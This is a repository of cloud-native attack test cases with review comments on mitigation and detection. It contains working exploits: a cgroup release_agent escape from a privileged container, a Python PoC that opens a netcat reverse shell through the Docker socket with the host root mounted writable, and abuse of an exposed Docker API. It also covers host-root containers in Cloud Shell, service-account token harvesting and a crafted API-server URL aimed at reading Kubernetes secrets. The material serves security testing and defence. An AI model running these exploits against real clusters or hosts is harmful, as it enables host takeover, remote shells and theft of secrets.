├── .gitignore
├── privileged
├── docker_run_cmd.sh
├── k8s_new_cmd.sh
├── 1-host-ps.sh
└── k8s_new.yaml
├── service_account
├── exec.sh
├── simple.yaml
├── masscan_pod.yaml
└── set_cert.sh
├── try_google_cloud
├── 2_host_info.sh
├── 1_startup_github_project.sh
└── host_root.sh
├── docker_api
├── 1_curl_api.sh
├── 2_ps_and_run_a_container.sh
└── poc.py
├── set_target.sample.sh
├── get_secert
└── curl.sh
└── readme.md

/.gitignore:
--------------------------------------------------------------------------------
# set_target.sh holds the real target values (set_target.sample.sh is the committed
# template); kubectl is the downloaded binary that service_account/set_cert.sh invokes
# as ./kubectl.
 1 | set_target.sh
 2 | nohup.out
 3 | .DS_Store
 4 | kubectl
--------------------------------------------------------------------------------
/privileged/docker_run_cmd.sh:
--------------------------------------------------------------------------------
# Interactive shell in a --privileged container; the starting point for
# privileged/1-host-ps.sh. Privileged containers get all capabilities and
# unrestricted device access, which is why the Pod Security 'baseline' profile
# rejects privileged: true.
 1 | docker run --privileged -it alpine sh
--------------------------------------------------------------------------------
/service_account/exec.sh:
--------------------------------------------------------------------------------
# Shell into the pod defined in service_account/simple.yaml.
# Original note: "use copy is better" — presumably copying files in with
# kubectl cp (as privileged/k8s_new_cmd.sh does) rather than typing them.
 1 | # use copy is better
 2 | kubectl exec -it service-account-simple -- sh
--------------------------------------------------------------------------------
/try_google_cloud/2_host_info.sh:
--------------------------------------------------------------------------------
# Host enumeration from the rshell container started by host_root.sh, which
# bind-mounts the host root fs at /rootfs.
 1 | #!/bin/bash
 2 | 
 3 | set -ue
 4 | 
# NOTE(review): chroot with no command starts an interactive shell; the two
# commands below only run after that shell exits, and then in the original
# root, not inside /rootfs.
 5 | chroot /rootfs
 6 | 
 7 | ps auxf | grep kube
 8 | docker ps -a
 9 | 
--------------------------------------------------------------------------------
/docker_api/1_curl_api.sh:
--------------------------------------------------------------------------------
# Probes a Docker daemon exposed over plain HTTP. ${docker_http_api} comes from
# set_target.sh (see set_target.sample.sh); set -u aborts if it is unset.
# A daemon reachable like this without TLS client auth is equivalent to root on
# its host; detection: unexpected GET /info on the daemon port.
 1 | #!/bin/bash
 2 | 
 3 | set -ue
 4 | 
 5 | curl -i "http://${docker_http_api}"
 6 | curl -i "http://${docker_http_api}/info"
 7 | 
--------------------------------------------------------------------------------
/set_target.sample.sh:
--------------------------------------------------------------------------------
# Template for set_target.sh (git-ignored). Values are samples only.
# NOTE(review): get_secert/curl.sh reads ${apiserver} (no underscore) plus
# ${ns} and ${secrets}; none of those are exported here.
 1 | # source set_target.sh
 2 | # all value is sample
 3 | 
 4 | export docker_http_api=127.0.0.1:2375
 5 | export api_server=127.0.0.0:6443
--------------------------------------------------------------------------------
/try_google_cloud/1_startup_github_project.sh:
--------------------------------------------------------------------------------
# Opens this repository in a Google Cloud Shell editor session.
# `open` is the macOS launcher; on Linux xdg-open is the equivalent.
 1 | open "https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/neargle/cloud_native_security_test_case.git"
--------------------------------------------------------------------------------
/privileged/k8s_new_cmd.sh:
--------------------------------------------------------------------------------
# Creates the privileged pod from k8s_new.yaml, copies 1-host-ps.sh into it and
# opens a shell. NOTE(review): no set -e, and nothing waits for the pod to be
# Running before cp/exec, so a failed or slow apply is not detected.
 1 | #!/bin/bash
 2 | 
 3 | kubectl apply -f "k8s_new.yaml"
 4 | kubectl cp "1-host-ps.sh" app-shell-test-2:/tmp/1-host-ps.sh
 5 | kubectl exec -it app-shell-test-2 -- sh
 6 | 
--------------------------------------------------------------------------------
/docker_api/2_ps_and_run_a_container.sh:
--------------------------------------------------------------------------------
# Lists containers on the remote daemon, starts one, lists again.
# ${docker_http_api} comes from set_target.sh; set -u aborts if unset.
 1 | #!/bin/bash
 2 | 
 3 | set -ue
 4 | 
 5 | docker -H "tcp://${docker_http_api}" ps
# detached alpine container without --rm or --name: it is left running after
# the script ends and must be removed by hand
 6 | docker -H "tcp://${docker_http_api}" run -it -d alpine sleep infinity
 7 | docker -H "tcp://${docker_http_api}" ps
 8 | 
 9 | 
--------------------------------------------------------------------------------
/service_account/simple.yaml:
--------------------------------------------------------------------------------
# Minimal long-running pod. No serviceAccountName and no
# automountServiceAccountToken: false, so the namespace's default service-account
# token is mounted at /var/run/secrets/kubernetes.io/serviceaccount — the path
# service_account/set_cert.sh reads. Mitigation for workloads that do not need
# API access: automountServiceAccountToken: false.
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: service-account-simple
 5 | spec:
 6 |   containers:
 7 |   - name: test-container
 8 |     image: "alpine"
 9 |     command: ["/bin/sh", "-c", "sleep infinity"]
10 | 
--------------------------------------------------------------------------------
/service_account/masscan_pod.yaml:
--------------------------------------------------------------------------------
# Same shape as simple.yaml but with a scanner image; the default
# service-account token is likewise auto-mounted. An image like this running
# in-cluster is a useful detection signal (image allow-lists, egress policy).
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: service-account-masscan
 5 | spec:
 6 |   containers:
 7 |   - name: test-container
 8 |     image: "adarnimrod/masscan"
 9 |     command: ["/bin/sh", "-c", "sleep infinity"]
10 | 
--------------------------------------------------------------------------------
/docker_api/poc.py:
--------------------------------------------------------------------------------
# Reverse-shell PoC over a host-mounted Docker socket. Anything that can reach
# /var/run/docker.sock can start a container with the host root fs bind-mounted
# read-write, which is equivalent to root on the host. 'xxxx' is a placeholder
# listener host left as-is. Mitigation: never mount the Docker socket into
# workloads; detection: containers created with a '/' bind mount.
 1 | import docker
 2 | client = docker.DockerClient(base_url='unix:///var/run/docker.sock')
 3 | data = client.containers.run(
 4 |     'alpine:latest',
 5 |     r'''sh -c "/usr/bin/nc xxxx 23334 -e /bin/sh" ''',
# remove=True: container is deleted on exit, so little is left for forensics
 6 |     remove=True,
# host '/' mounted writable at /tmp/root inside the container
 7 |     volumes={'/': {'bind': '/tmp/root', 'mode': 'rw'}}
 8 | )
 9 | print(data)
10 | 
--------------------------------------------------------------------------------
/get_secert/curl.sh:
--------------------------------------------------------------------------------
# Both requests use a client certificate (--cert/--key) and pin the cluster CA.
# They read ${apiserver}; NOTE(review): set_target.sample.sh exports api_server
# (with underscore), and ${ns}/${secrets} are not set anywhere in this repo.
 1 | # origin url
 2 | curl --cacert ./ca.crt --cert ./cert --key key "https://${apiserver}:6443/api/v1/namespaces/istio-dev/pods/service-account-simple/log?container=test-container"
 3 | 
# Same credentials, but the URL path is now the secrets endpoint; the
# pods/.../log string survives only inside the query (the 'feihua' parameter is
# a dummy). This tests whether an authorizer or proxy in front of the API
# decides on the parsed path or on substring matching — kube-apiserver RBAC
# derives resource and verb from the parsed path.
 4 | # the hacked url
 5 | curl --cacert ./ca.crt --cert ./cert --key key "https://${apiserver}:6443/api/v1/namespaces/${ns}/secrets/${secrets}?feihua=/pods/service-account-simple/log?container=test-container"
--------------------------------------------------------------------------------
/service_account/set_cert.sh:
--------------------------------------------------------------------------------
# Builds a kubeconfig (cluster/context 'cfc', user 'user') from the in-pod
# service-account token and CA. ${api_server} comes from set_target.sh.
 1 | ./kubectl config set-cluster cfc --server=https://${api_server} --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
 2 | ./kubectl config set-context cfc --cluster=cfc
# --token=$(cat ...) places the token on argv, visible in ps and shell history;
# ${api_server} and the substitution are also unquoted.
 3 | ./kubectl config set-credentials user --token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
 4 | ./kubectl config set-context cfc --user=user
 5 | ./kubectl config use-context cfc
--------------------------------------------------------------------------------
/try_google_cloud/host_root.sh:
--------------------------------------------------------------------------------
# Starts a privileged container on the Cloud Shell host via the host Docker
# socket, with /proc, /sys and / of the host bind-mounted (2_host_info.sh relies
# on the /rootfs mount). host_docker_sock is Cloud Shell-specific.
 1 | #!/bin/bash
 2 | 
 3 | set -ue
 4 | 
 5 | export host_docker_sock="unix:///google/host/var/run/docker.sock"
 6 | 
 7 | sudo docker -H ${host_docker_sock} pull alpine:latest
# NOTE(review): under set -e a re-run stops here once a container named
# 'rshell' already exists, so the 'start' on the next line is never reached.
 8 | sudo docker -H ${host_docker_sock} run -d -it --name rshell -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
 9 | sudo docker -H ${host_docker_sock} start rshell
10 | sudo docker -H ${host_docker_sock} exec -it rshell /bin/sh
11 | 
--------------------------------------------------------------------------------
/privileged/1-host-ps.sh:
--------------------------------------------------------------------------------
# Demonstrates the cgroup v1 release_agent escape from a privileged container:
# mount cgroupfs, point release_agent at a host-resolvable path, let a cgroup
# empty so the kernel runs the agent on the host. Needs privileged /
# CAP_SYS_ADMIN and a cgroup v1 host (cgroup v2 has no release_agent).
# Mitigation: no privileged pods (Pod Security 'baseline'), cgroup v2, user
# namespaces. Detection: cgroupfs mounts and writes to */release_agent from
# inside a container.
 1 | #!/bin/bash
 2 | 
 3 | set -uex
 4 | 
# mount the memory cgroup controller and create a child cgroup 'x'
 5 | mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 6 | 
# notify_on_release=1: the kernel invokes release_agent when 'x' becomes empty
 7 | echo 1 > /tmp/cgrp/x/notify_on_release
# host-side path of this container's overlay upper dir, parsed from the
# 'upperdir=' mount option in /etc/mtab (the regex matches 'perdir=')
 8 | host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# the agent runs on the host, so the path must resolve there — hence host_path
 9 | echo "$host_path/cmd" > /tmp/cgrp/release_agent
10 | 
# /cmd in the container is $host_path/cmd on the host; the payload only writes
# the host process list to $host_path/output (= /output here)
11 | echo '#!/bin/sh' > /cmd
12 | echo "ps aux > $host_path/output" >> /cmd
13 | chmod a+x /cmd
14 | 
# place a short-lived shell in cgroup 'x'; when it exits the cgroup is empty
15 | sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
16 | 
# the agent runs asynchronously; the 2 s wait is arbitrary
17 | sleep 2
18 | cat "/output"
19 | 
--------------------------------------------------------------------------------
/privileged/k8s_new.yaml:
--------------------------------------------------------------------------------
# Pod used by privileged/k8s_new_cmd.sh. privileged: true is what
# privileged/1-host-ps.sh relies on; hostNetwork: true additionally shares the
# node's network namespace. Both are rejected by the Pod Security 'baseline'
# profile. The emptyDir volume is not referenced by any script in this repo.
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: app-shell-test-2
 5 | spec:
 6 |   volumes:
 7 |   - name: shared-data
 8 |     emptyDir: {}
 9 |   containers:
10 |   - name: test-container
11 |     image: "alpine"
12 |     securityContext:
13 |       privileged: true
14 |     command: ["/bin/sh", "-c", "while true; do sleep 10000; done"]
15 |     volumeMounts:
16 |     - name: shared-data
17 |       mountPath: /usr/share/nginx/html
18 |   hostNetwork: true
19 |   dnsPolicy: Default
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | 所有的代码都已经集成到了 CDK 的 EXP 中,可参考 [https://github.com/cdk-team/CDK/](https://github.com/cdk-team/CDK/)
 2 | 
 3 | .
 4 | ├── docker_api
 5 | │   ├── 1_curl_api.sh
 6 | │   └── 2_ps_and_run_a_container.sh
 7 | ├── nohup.out
 8 | ├── privileged
 9 | │   ├── 1-host-ps.sh
10 | │   ├── docker_run_cmd.sh
11 | │   ├── k8s_new.yaml
12 | │   └── k8s_new_cmd.sh
13 | ├── readme.md
14 | ├── service_account
15 | │   ├── exec.sh
16 | │   ├── kubectl
17 | │   ├── set_cert.sh
18 | │   └── simple.yaml
19 | ├── set_target.sample.sh
20 | ├── set_target.sh
21 | └── try_google_cloud
22 | ├── 1_startup_github_project.sh
23 | ├── 2_host_info.sh
24 | └── host_root.sh
25 | 
26 | 4 directories, 17 files
27 | 
--------------------------------------------------------------------------------